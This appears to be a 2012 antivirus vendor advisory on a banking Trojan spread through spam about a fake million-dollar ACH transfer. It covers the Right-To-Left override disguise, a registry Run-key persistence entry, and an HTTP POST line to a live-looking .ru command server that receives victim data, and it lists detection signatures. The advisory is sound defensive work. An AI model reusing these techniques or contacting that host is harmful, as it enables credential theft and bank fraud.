Million dollar Tax draw spam leads to Banker Trojan

May 11, 2012

SonicWALL UTM Research team found a new Banking Trojan variant being spammed heavily over the past three days. The spammed e-mail pretends to contain a Bank form asking the user to confirm an ACH transfer worth one million dollars. The zipped attachment in the email actually contains a malicious executable file that uses Right-To-Left override technique to present itself as a document file.

SonicWALL Research team have captured more than 2000 copies of e-mail from this spam campaign in past 48 hours. Below are some sample messages:

screenshot

The malicious executable found in the zipped attachments looks like:

screenshot

Upon execution, it performs the following activities:

  • Drops a copy of itself and runs it:

    • (Application Data)KB00903122.exe [Detected as GAV: Injector.NYF (Trojan)]
  • Registry modifications:

    • HKUUserIDSoftwareMicrosoftWindows Media Center [Uses this key to save banking site list and script to inject]
    • HKUUserIDSoftwareMicrosoftWindowsCurrentVersionInternet SettingsGlobalUserOffline: 0x00000000
    • HKUUserIDSoftwareMicrosoftWindowsCurrentVersionRunKB00903122.exe: ""(Application Data)KB00903122.exe""
  • Connects to a remote server to send victim machine's information and receives a list of banking sites & script to inject:
     			POST /rwx/B1_3n9/in/ HTTP/1.1 			Host: hmvmgywkvayilcwh.ru:8080			 		

    screenshot
    screenshot

SonicWALL Gateway AntiVirus provides proactive protection against this spam campaign via following signature:

  • GAV: Injector.NYF (Trojan)
  • GAV: Suspicious#rtol.dc (Trojan)

screenshot